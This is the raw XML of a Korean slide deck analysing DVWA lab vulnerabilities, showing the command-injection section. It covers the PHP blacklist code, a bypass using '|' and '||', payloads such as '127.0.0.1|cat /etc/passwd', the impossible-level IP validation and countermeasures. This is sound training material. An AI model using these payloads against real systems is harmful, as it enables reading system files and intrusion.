              </a:rPr>
              <a:t>/passwd) &gt;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"/>
              </a:rPr>
              <a:t>됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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파이프라인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공백 과 파이프라인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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개만 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1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하고있음으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 구문상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1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헛점을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 이용한  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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'| '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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'||＇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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를 이용한 위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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개의 코드만 공격이 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans"/>
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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71C3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2424907"/>
            <a:ext cx="5748414" cy="439680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&lt;?php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isset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$_POST[ 'Submit' ]  ) ) {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Get input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$target = trim($_REQUEST[ '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' ]);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Set blacklist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$substitutions = array(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'&amp;'  =&gt; '',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';'  =&gt; '',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'| ' =&gt; '',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'-'  =&gt; '',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'$'  =&gt; '',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'('  =&gt; '',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')'  =&gt; '',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'`'  =&gt; '',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'||' =&gt; '',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);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DDD1D-DA30-4D90-ADD1-1CA5D84EEA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932999" y="4108225"/>
            <a:ext cx="3888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→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Command Injection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에 활용되는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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연산자들을 전부 치환하여 삭제처리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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FF62B-DFF8-4760-864B-F7020EB16B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225299" y="4820573"/>
            <a:ext cx="4006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→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‘|’, ‘||’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에 대한 필터링이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1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적용된것처럼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보이나</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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‘|’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의 경우엔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‘| + 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공백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’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이 포함되어 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1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입력값에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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대해서만 필터링하기 때문에 취약점으로 활용가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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5874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5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Level :Impossible)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1) Command Injection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시도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high level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사용했던 명령어를 입력하게되면 유효한 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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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입력하라는 메세지가 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="160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E4DA2BD2-9370-4511-9CB7-7D2DA9606BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2398570"/>
            <a:ext cx="5736954" cy="806926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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&gt; 127.0.0.1|cat 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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>etc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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&gt; 127.0.0|| cat /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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>etc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나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/passwd </a:t>
            </a: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  <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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 panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="나눔스퀘어_ac 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896D5B-678F-4700-BE18-B2E5922EF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3365500"/>
            <a:ext cx="63341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346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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격 진행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(Security Level :Impossible)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="28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>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2) impossible Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변경된 부분만 표시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"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buFontTx/>
              <a:buChar char="-"/>
            </a:pP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endParaRPr lang="en-US" altLang="ko-KR" sz="14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endParaRPr lang="en-US" altLang="ko-KR" sz="17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sz="1700" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>입력값에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t> 백슬래시를 제거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>이스케이프 문자 필터링</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>옥텟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>(.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>을 기준으로 문자열을 분할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>배열로 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700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pPr algn="l"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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그 후 조건문에서 배열의 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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개이고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1700" dirty="0" err="1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옥텟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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개만 허용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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각 배열안의 값이 정수일 때만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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명령어를 실행하도록 되어있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2424906"/>
            <a:ext cx="5748414" cy="476329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// Check Anti-CSRF token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checkToken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$_REQUEST[ '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user_token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' ], $_SESSION[ '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session_token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' ], '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index.php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' );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Get input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$target = $_REQUEST[ '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' ];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$target =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stripslashes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$target );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// Split the IP into 4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octects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$octet = explode( ".", $target );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if( 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is_numeric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$octet[0] ) ) &amp;&amp; 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is_numeric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$octet[1] ) ) &amp;&amp; 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is_numeric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$octet[2] ) ) &amp;&amp; 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is_numeric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$octet[3] ) ) &amp;&amp; (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sizeof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 $octet ) == 4 ) ) {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// If all 4 octets are int's put the IP back together.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$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];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DDD1D-DA30-4D90-ADD1-1CA5D84EEA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027755" y="3933805"/>
            <a:ext cx="3888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→ 백슬래시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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(\)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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제거</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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FF62B-DFF8-4760-864B-F7020EB16B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022350" y="4637901"/>
            <a:ext cx="4839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→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$target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의 값을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‘.’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과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octet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을 기준으로 잘라서 배열로 반환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79442-E9CB-47A5-93D0-235C2C0784CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="929905" y="4987218"/>
            <a:ext cx="3788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각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1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옥텟에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해당하는 값들이 숫자인지 확인한 뒤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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배열의 크기가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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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인지 확인 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xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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73282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61A93-3991-4913-94F3-62BD06023FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242544" y="64262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3" name="사각형: 둥근 위쪽 모서리 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4970B356-884D-4505-A465-39E0CB9344B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="13462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092274C3-3F70-4386-A0E3-60BF0C5FEED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="18542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3-2) Command Injection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B863F2B-21ED-448C-B9E9-BA83394EBDB1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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435FE9A8-9CE6-4A55-BED9-90ACB77D5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914401"/>
            <a:ext cx="5915025" cy="719099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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결론 및 대응방안</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="내용 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E890C3-535A-49DA-9E23-48A1C936DD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7" y="1968498"/>
            <a:ext cx="5902671" cy="6953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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>은 시스템 명령어를 호출하는 애플리케이션의 입력 값을 조작하여 허용하지 않은 시스템 명령어는 실행시키는 위험한 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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algn="l"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>웹 애플리케이션이 많이 발전하지 못했던 시절 특정 데이터를 처리하기 위해 시스템 명령어를 웹 애플리케이션에서 호출하여 사용 하던 것으로 지금까지 빈번히 발생하는 문제점 중 하나다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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1291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2851</TotalTime>
  <Words>24255</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 용지(210x297mm)</PresentationFormat>
  <Paragraphs>3127</Paragraphs>
  <Slides>393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393</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="410" baseType="lpstr">
      <vt:lpstr>applesdgothicneo-ultralight</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>D2Coding</vt:lpstr>
      <vt:lpstr>DX국민시대</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>나눔스퀘어_ac</vt:lpstr>
      <vt:lpstr>나눔스퀘어_ac Bold</vt:lpstr>
      <vt:lpstr>Dotum</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bell MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>DVWA 를 활용한 주요 취약점 분석</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>1. 프로젝트 개요</vt:lpstr>
      <vt:lpstr>1. 프로젝트 개요</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>1. OWASP TOP 10 2019</vt:lpstr>
      <vt:lpstr>1. OWASP TOP 10 2019</vt:lpstr>
      <vt:lpstr>설치 및 설정</vt:lpstr>
      <vt:lpstr>설치 및 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>유저 생성</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>XAMPP 다운로드</vt:lpstr>
      <vt:lpstr>XAMPP 설치</vt:lpstr>
      <vt:lpstr>XAMPP 설치</vt:lpstr>
      <vt:lpstr>XAMPP 설치</vt:lpstr>
      <vt:lpstr>XAMPP – Manage Servers</vt:lpstr>
      <vt:lpstr>XAMPP</vt:lpstr>
      <vt:lpstr>phpMyAdmin - database</vt:lpstr>
      <vt:lpstr>DVWA-2.0.1</vt:lpstr>
      <vt:lpstr>폴더들 권한주기</vt:lpstr>
      <vt:lpstr>Database 사전 설정</vt:lpstr>
      <vt:lpstr>캡챠 키 받아오기</vt:lpstr>
      <vt:lpstr>Php.ini 수정 </vt:lpstr>
      <vt:lpstr>config.inc.php 수정 </vt:lpstr>
      <vt:lpstr>폴더들 권한주기</vt:lpstr>
      <vt:lpstr>설정 완료 창</vt:lpstr>
      <vt:lpstr>로그인</vt:lpstr>
      <vt:lpstr>완료</vt:lpstr>
      <vt:lpstr>DVWA를 활용한 취약점 분석</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>1. 개요</vt:lpstr>
      <vt:lpstr>2. DVWA 설정</vt:lpstr>
      <vt:lpstr>3. Burpsuite 설정</vt:lpstr>
      <vt:lpstr>3. Burpsuite 설정</vt:lpstr>
      <vt:lpstr>3. Burpsuite 설정</vt:lpstr>
      <vt:lpstr>3. Burpsuite 설정</vt:lpstr>
      <vt:lpstr>3. Burpsuite 설정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4. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>5. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>5. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>5. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>7. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>7. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>7. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>7. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>8. 방어 대책</vt:lpstr>
      <vt:lpstr> Command Injection</vt:lpstr>
      <vt:lpstr>1. 공격 개요 및 설정</vt:lpstr>
      <vt:lpstr>2. 공격 진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격 진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격 진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격 진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격 진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>3. 공격 진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격 진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격 진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>4. 공격 진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>4. 공격 진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>4. 공격 진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>5. 공격 진행 (Security Level :Impossible)</vt:lpstr>
      <vt:lpstr>5. 공격 진행 (Security Level :Impossible)</vt:lpstr>
      <vt:lpstr>6. 결론 및 대응방안</vt:lpstr>
      <vt:lpstr>6. 결론 및 대응방안</vt:lpstr>
      <vt:lpstr> CSRF</vt:lpstr>
      <vt:lpstr>CSRF 개요</vt:lpstr>
      <vt:lpstr>CSRF 개요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Medium</vt:lpstr>
      <vt:lpstr>Security Level : Medium</vt:lpstr>
      <vt:lpstr>Security Level : Medium</vt:lpstr>
      <vt:lpstr>Security Level : Medium</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>File Inclusion</vt:lpstr>
      <vt:lpstr>1. 공격 개요</vt:lpstr>
      <vt:lpstr>2. 목표 PC 환경</vt:lpstr>
      <vt:lpstr>3. 방화벽 설정</vt:lpstr>
      <vt:lpstr>4. 난이도 변경</vt:lpstr>
      <vt:lpstr>5. 공격 진행</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Meduim)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Meduim)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Meduim)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>6. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>7. 방어 개요</vt:lpstr>
      <vt:lpstr>8. 대비책 – Low 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – Medium 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – Medium 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – High 단계</vt:lpstr>
